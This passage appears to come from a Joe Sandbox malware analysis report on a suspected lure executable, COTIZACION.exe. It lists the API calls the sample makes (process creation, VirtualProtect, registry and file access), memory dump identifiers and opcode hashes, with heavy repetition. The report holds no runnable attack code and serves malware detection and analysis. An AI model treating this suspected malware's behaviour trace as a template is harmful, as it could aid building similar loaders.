                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseQueryValue
                                                                                                • String ID: Call
                                                                                                • API String ID: 3356406503-1824292864
                                                                                                • Opcode ID: 76b6ba2905dba72e0879de14cdf3f2fb9278ac09f103d2f047db2673b29e615b
                                                                                                • Instruction ID: 1ae9e56a03760404e91669882a34a602e62d6bc2f034f3a498143100352ea1f7
                                                                                                • Opcode Fuzzy Hash: 76b6ba2905dba72e0879de14cdf3f2fb9278ac09f103d2f047db2673b29e615b
                                                                                                • Instruction Fuzzy Hash: F6015EB652010AABDF218FA4DD06EEF7BA8EF44354F110136F905E2260E334DA64DB94

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1030 405dfc-405e0c CreateDirectoryW 1031 405e16-405e19 1030->1031 1032 405e0e-405e14 GetLastError 1030->1032 1032->1031
                                                                                                APIs
                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CA7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00405E04
                                                                                                • GetLastError.KERNEL32 ref: 00405E0E
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DFC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateDirectoryErrorLast
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                • API String ID: 1375471231-297319885
                                                                                                • Opcode ID: 0648b17569fc2713f910b90d2ba9bcc6c5026819f2e8f4ff2f6a8f9bab12dfc5
                                                                                                • Instruction ID: 1d45a01f7acee8fa23fe776dff3dd1d011af88d7d8ca29917c3c3e776444c4f1
                                                                                                • Opcode Fuzzy Hash: 0648b17569fc2713f910b90d2ba9bcc6c5026819f2e8f4ff2f6a8f9bab12dfc5
                                                                                                • Instruction Fuzzy Hash: 74C012326000309BC7602B65AE08A87BE94EB506A13068239B988E2220DA308C54CAE8
                                                                                                APIs
                                                                                                  • Part of subcall function 70022351: GlobalFree.KERNEL32(?), ref: 70022A44
                                                                                                  • Part of subcall function 70022351: GlobalFree.KERNEL32(?), ref: 70022A4A
                                                                                                  • Part of subcall function 70022351: GlobalFree.KERNEL32(?), ref: 70022A50
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 70021738
                                                                                                • FreeLibrary.KERNEL32(?), ref: 700217C3
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 700217E9
                                                                                                  • Part of subcall function 70021FCB: GlobalAlloc.KERNEL32(00000040,?), ref: 70021FFA
                                                                                                  • Part of subcall function 700217F7: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,70021708,00000000), ref: 7002189A
                                                                                                  • Part of subcall function 70021F1E: wsprintfW.USER32 ref: 70021F51
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2037043601.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2036962421.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2037063212.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2037081100.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_70020000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                • String ID:
                                                                                                • API String ID: 3962662361-0
                                                                                                • Opcode ID: 9ce89e61440179cb6e749ad94ad8171360b05b0ca1aaf4e4cb985fff4bcb6601
                                                                                                • Instruction ID: be55c39df0921b966c114d36cc37567fb3b7bdd9f064ac6c709c36b544e3c3da
                                                                                                • Opcode Fuzzy Hash: 9ce89e61440179cb6e749ad94ad8171360b05b0ca1aaf4e4cb985fff4bcb6601
                                                                                                • Instruction Fuzzy Hash: E841B432404248AED7709F64FC85BDE37FEBBA0B33F204019F94E56252DB756985C650
                                                                                                APIs
                                                                                                • MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
                                                                                                • SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 3850602802-0
                                                                                                • Opcode ID: 21554dfdf2296733f6a7aae3810b83fc303a9337ac7eb4ef6af54ee552a22d80
                                                                                                • Instruction ID: 15b31486c92c371a01b824ec8c308dd00c5fb3f6de234e3455dc008c55755f60
                                                                                                • Opcode Fuzzy Hash: 21554dfdf2296733f6a7aae3810b83fc303a9337ac7eb4ef6af54ee552a22d80
                                                                                                • Instruction Fuzzy Hash: 2A01D472E542309BD7196F28AC09B2A2699A7C1711F15893EF901F72F1E6B89D01879C
                                                                                                APIs
                                                                                                  • Part of subcall function 00406AF8: lstrcpynW.KERNEL32(?,?,00000400,0040384F,007A7540,NSIS Error), ref: 00406B05
                                                                                                  • Part of subcall function 00406BA3: CharNextW.USER32(?,?,?,00000000,007A4288,0040662D,007A4288,007A4288,?,?,?,00406719,?,00000000,76F93420,?), ref: 00406BB2
                                                                                                  • Part of subcall function 00406BA3: CharNextW.USER32(00000000), ref: 00406BB7
                                                                                                  • Part of subcall function 00406BA3: CharNextW.USER32(00000000), ref: 00406BD1
                                                                                                  • Part of subcall function 00406D1B: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406D90
                                                                                                  • Part of subcall function 00406D1B: CharNextW.USER32(?,?,?,00000000), ref: 00406D9F
                                                                                                  • Part of subcall function 00406D1B: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DA4
                                                                                                  • Part of subcall function 00406D1B: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DBC
                                                                                                • lstrlenW.KERNEL32(007A4288,00000000,007A4288,007A4288,?,?,?,00406719,?,00000000,76F93420,?), ref: 0040666A
                                                                                                • GetFileAttributesW.KERNELBASE(007A4288,007A4288), ref: 0040667B
                                                                                                  • Part of subcall function 004065AD: FindFirstFileW.KERNELBASE(?,007A5E88,00000000,0040665A,007A4288), ref: 004065B8
                                                                                                  • Part of subcall function 004065AD: FindClose.KERNEL32(00000000), ref: 004065C4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: Char$Next$FileFind$AttributesCloseFirstPrevlstrcpynlstrlen
                                                                                                • String ID:
                                                                                                • API String ID: 1879705256-0
                                                                                                • Opcode ID: 3b9d5aeb4753024ac2323fedf4887ec0200a7770af3d0f5eda4629e85134c37a
                                                                                                • Instruction ID: a0caebe489df7e9b8c47fc78556c087e467958ed1b806a88a2837ae242d5d264
                                                                                                • Opcode Fuzzy Hash: 3b9d5aeb4753024ac2323fedf4887ec0200a7770af3d0f5eda4629e85134c37a
                                                                                                • Instruction Fuzzy Hash: FAF0C2614042212AC72037751E88A2B255C8E4635971B4F3FFCA7F12D2CA7ECC31957D
                                                                                                APIs
                                                                                                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A3A40,?), ref: 004066DD
                                                                                                • CloseHandle.KERNEL32(?), ref: 004066EA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                • String ID:
                                                                                                • API String ID: 3712363035-0
                                                                                                • Opcode ID: 36c5eb473c901fdc976d11b5d23e54a470827d4f9f65b3378b18ae8ddc32ee08
                                                                                                • Instruction ID: 38b84478e037bba77e5bda8d52abba300c1c8c141792dec0b9fd1b8b871a7deb
                                                                                                • Opcode Fuzzy Hash: 36c5eb473c901fdc976d11b5d23e54a470827d4f9f65b3378b18ae8ddc32ee08
                                                                                                • Instruction Fuzzy Hash: 45E0BFF0600219BFFB009F64ED05E7BB66CFB44604F008529BD51E6150D77499149A79
                                                                                                APIs
                                                                                                • GetFileAttributesW.KERNELBASE(?,0040340D,C:\Users\user\Desktop\COTIZACION.exe,80000000,00000003), ref: 004068FD
                                                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000), ref: 0040691D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$AttributesCreate
                                                                                                • String ID:
                                                                                                • API String ID: 415043291-0
                                                                                                • Opcode ID: 0b70b3aee83a9b3875abd98ff145d1d59e445032f30ecb3830cc7005a44e8a60
                                                                                                • Instruction ID: 2b20bdeb62c6161fa823f395ef17c7eb789f23499ed64d7ea8bf83f44df62fc9
                                                                                                • Opcode Fuzzy Hash: 0b70b3aee83a9b3875abd98ff145d1d59e445032f30ecb3830cc7005a44e8a60
                                                                                                • Instruction Fuzzy Hash: 3ED09E71118201AEDF054F20DE4AF1EBA65EF84710F114A2CF6A6D40F0DA718865AA15
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2037043601.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2036962421.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2037063212.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2037081100.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_70020000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileRead
                                                                                                • String ID:
                                                                                                • API String ID: 2738559852-0
                                                                                                • Opcode ID: f9283a66d2fad058b0aa10273f739c2b47a7375dcd5dc0b10ab366d8ce0cddd3
                                                                                                • Instruction ID: bbb94ea985d37248bf57638408fdaa933b7129883741cf30f4bbc18622189d34
                                                                                                • Opcode Fuzzy Hash: f9283a66d2fad058b0aa10273f739c2b47a7375dcd5dc0b10ab366d8ce0cddd3
                                                                                                • Instruction Fuzzy Hash: 57419176800204AFEB109FA1EDC6B8D37B6EB54B37F30446AE504DA262D734A5429AC9
                                                                                                APIs
                                                                                                • WriteFile.KERNELBASE(?,?,?,?,00000000,?,00000000,?,00793200,00403326,?,00793200,?,00793200,?,?), ref: 00406A00
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3934441357-0
                                                                                                • Opcode ID: fcbaaa44ab5e5c94c5d9c511509a2faa156d79933b004821766515c4fe93841a
                                                                                                • Instruction ID: af586fd2f7f6880044e5fe5766d6096d47c0719768b2310f5fb2dcc6f4abfd7b
                                                                                                • Opcode Fuzzy Hash: fcbaaa44ab5e5c94c5d9c511509a2faa156d79933b004821766515c4fe93841a
                                                                                                • Instruction Fuzzy Hash: 68E0BF32600119BB8F205B56DD04D9FBF6DEE927A07124026F906B6150D670EA51DAE4
                                                                                                APIs
                                                                                                • ReadFile.KERNELBASE(?,?,?,?,00000000,?,00000000,?,00000000,004031A2,?,00000004,00000000,00000000,00000000,00000000), ref: 0040693D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileRead
                                                                                                • String ID:
                                                                                                • API String ID: 2738559852-0
                                                                                                • Opcode ID: f8dde0e6d0967dcd1486054d06716264d6198d5106f5dd6c4da627d3f0af441a
                                                                                                • Instruction ID: de6cc0abbc936f950c0aa48064430f9d9b1dfb465831d1c2e6fd43c94deb3c7e
                                                                                                • Opcode Fuzzy Hash: f8dde0e6d0967dcd1486054d06716264d6198d5106f5dd6c4da627d3f0af441a
                                                                                                • Instruction Fuzzy Hash: B7E0BF72200119BB8F215F46DD04D9FBF6DEE956A07114026B905A6150D670EA11D6E4
                                                                                                APIs
                                                                                                • VirtualProtect.KERNELBASE(7002501C,00000004,00000040,70025034), ref: 70021A68
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2037043601.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2036962421.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2037063212.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2037081100.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_70020000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: ProtectVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 544645111-0
                                                                                                • Opcode ID: 9d5a371224f8d692970f8e46aec4d56ca0667546dec059c43661fe9bd4619a4c
                                                                                                • Instruction ID: e752745b4308cea9c87d4b3da0d9a8f21f5db5326b0bd8f7532dd6f20b304af4
                                                                                                • Opcode Fuzzy Hash: 9d5a371224f8d692970f8e46aec4d56ca0667546dec059c43661fe9bd4619a4c
                                                                                                • Instruction Fuzzy Hash: 9AF0A272919740EEE3148F1AACC87093AE0B718777F30856EF64DDA362C3704102AB9E
                                                                                                APIs
                                                                                                • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00406983,?,?,?,?,Call,00000000,00000000), ref: 004062DA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: Open
                                                                                                • String ID:
                                                                                                • API String ID: 71445658-0
                                                                                                • Opcode ID: 5d90062fdd1cff32f27602045ec2692a1b627fa5483aed50fd6290a01ccc32d2
                                                                                                • Instruction ID: 8275c49ac47c74d38988e0f8258bf7c149b7cc7998a497f72a9ef83b4f38b8ad
                                                                                                • Opcode Fuzzy Hash: 5d90062fdd1cff32f27602045ec2692a1b627fa5483aed50fd6290a01ccc32d2
                                                                                                • Instruction Fuzzy Hash: 51D0123204020DBBDF11AF90DD01FAB372DAB08750F01443AFE16A40A0D775D531A718
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054D8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
